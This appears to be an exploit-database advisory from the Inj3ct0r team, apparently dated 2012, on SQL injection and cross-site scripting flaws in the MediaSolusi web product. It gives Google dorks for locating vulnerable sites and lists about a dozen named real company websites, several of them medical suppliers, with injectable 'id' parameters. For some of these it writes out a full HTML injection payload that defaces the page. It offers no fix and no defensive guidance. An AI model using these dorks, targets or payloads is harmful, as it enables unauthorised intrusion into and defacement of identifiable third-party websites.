MediaSolusi - XSS/ SQL Injection Vulnerability

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0      _                   __           __       __                      1
1    /' \            __  /'__`\        /\ \__  /'__`\                    0
0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
1                   \ \____/ >> Exploit database separated by exploit    0
0                    \/___/          type (local, remote, DoS, etc.)     1
1                                                                        1
0   [x] Official Website: http://www.1337day.com                         0
1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
0                                                                        0
1                $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$              1
0                I'm NuxbieCyber Member From Inj3ct0r TEAM               1
1                $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1

==========================================================================
<<<:>>>          MediaSolusi - SQL Injection Vulnerability         <<<:>>>
==========================================================================
                                                          
 - Discovered By:
 ||| TheCyberNuxbie - Independent Security Research |||
 <<< [email protected] >>> YM: nux_exploit
 [ www.thecybernuxbie.com ] $ CP: +62856-2538-963

 - Info WebApps:
 This Content Develop By MediaKreasi:
 http://www.mediasolusi.com/
 
 - Google Dork:
 inurl:"/products/category/?id=" nm="
 intext:"All rights reserved. - By Media Kreasi"
 
 - Exploit Concept:
 http://lokalisasi/WebApps/?id=[SQL Injection]
 
 - Sample WebApps Vuln SQLi:
 http://wiratamaperkasa.com/products/category/?id=6' + [SQL Injection]
 http://aim-safety.com/products/category/?id=13' + [SQL Injection]
 http://agrotama.com/products/detail/?id=33' + [SQL Injection]
 http://karyasejati.com/service/detail/?id=9' + [SQL Injection]
 http://anugerahautomaticgate.com/solarpanel/products/category/?id=37' + [SQL Injection]
 http://tirtamedicalindonesia.com/products/detail/?id=10' + [SQL Injection]
 http://mutiaramedical.com/products/category/?id=6' + [SQL Injection]
 http://alatkesehatan.co.id/products/category/?id=6' + [SQL Injection]
 http://bintangtiga.com/products/category/?id=2' + [SQL Injection]
 http://karyasejati.com/products/category/?id=10' + [SQL Injection]
 http://memopesta.com/products/category/?id=19' + [SQL Injection]
 http://bintangutama.net/products/category/?id=6' + [SQL Injection]

 - Google Dork:
 inurl:"/products/category/?id=" nm="
 intext:"All rights reserved. - By Media Kreasi"

 - Exploit Concept:
 http://lokalisasi/?id=[XSS]

 - Sample Web Persistent XSS Vulnerability:
 http://wiratamaperkasa.com/products/category/?id=<marquee><font
color=red size=15>XSSed By Nuxbie</font></marquee> <:- [XSS]
 http://aim-safety.com/products/category/?id=<marquee><font color=red
size=15>XSSed By Nuxbie</font></marquee> <:- [XSS]
 http://agrotama.com/products/detail/?id=<marquee><font color=red
size=15>XSSed By Nuxbie</font></marquee> <:- [XSS]
 http://karyasejati.com/service/detail/?id=<marquee><font color=red
size=15>XSSed By Nuxbie</font></marquee> <:- [XSS]
 http://anugerahautomaticgate.com/solarpanel/products/category/?id=<marquee><font
color=red size=15>XSSed By Nuxbie</font></marquee> <:- [XSS]
 http://tirtamedicalindonesia.com/products/detail/?id=<marquee><font
color=red size=15>XSSed By Nuxbie</font></marquee> <:- [XSS]
 http://mutiaramedical.com/products/category/?id=<marquee><font
color=red size=15>XSSed By Nuxbie</font></marquee> <:- [XSS]
 http://alatkesehatan.co.id/products/category/?id=<marquee><font
color=red size=15>XSSed By Nuxbie</font></marquee> <:- [XSS]
 http://bintangtiga.com/products/category/?id=<marquee><font color=red
size=15>XSSed By Nuxbie</font></marquee> <:- [XSS]
 http://karyasejati.com/products/category/?id=<marquee><font color=red
size=15>XSSed By Nuxbie</font></marquee> <:- [XSS]

 , And More @ Google...!!!
 
 -:>>> Special Thanks <<<:-
 *** 1337day Inj3ct0r TEAM ***
 ...:::' All Member & Staff Inj3ct0r TEAM ':::...
 [ r007er, Sid3^effects, r4dc0re, CroSs, KedAns-Dz, indoushka ]
 [ SeeMe, KnocKout, ZoRLu, anT!-Tr0J4n, Kalashinkov3, Angel Injection ]
 [ cr4wl3r, team_elite, erytronic, r4h0x, cyberbag0r, Denc0plax, AlexMx ]
 [ cyberlog, donyskynet, elmonny, Hmei7, Ketek, fazzta, eidelweiss ]
 [ kaMtiEz, g3mbeL_YCL, YazidNoeha, AfniGates, Puzy_4ngeLz, Reynaey ,etc ]
 #########################################################################
  
 [ Inj3ct0r | PacketStromSecurity | Exploit-DB | Exploit-ID | Devilzc0de ]
 
 Me @ Solo Raya, 24 March 2012 @ 07:24 AM. AntiSecureCrew IT-Terminator
 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$



#  0day.today [2018-03-20]  #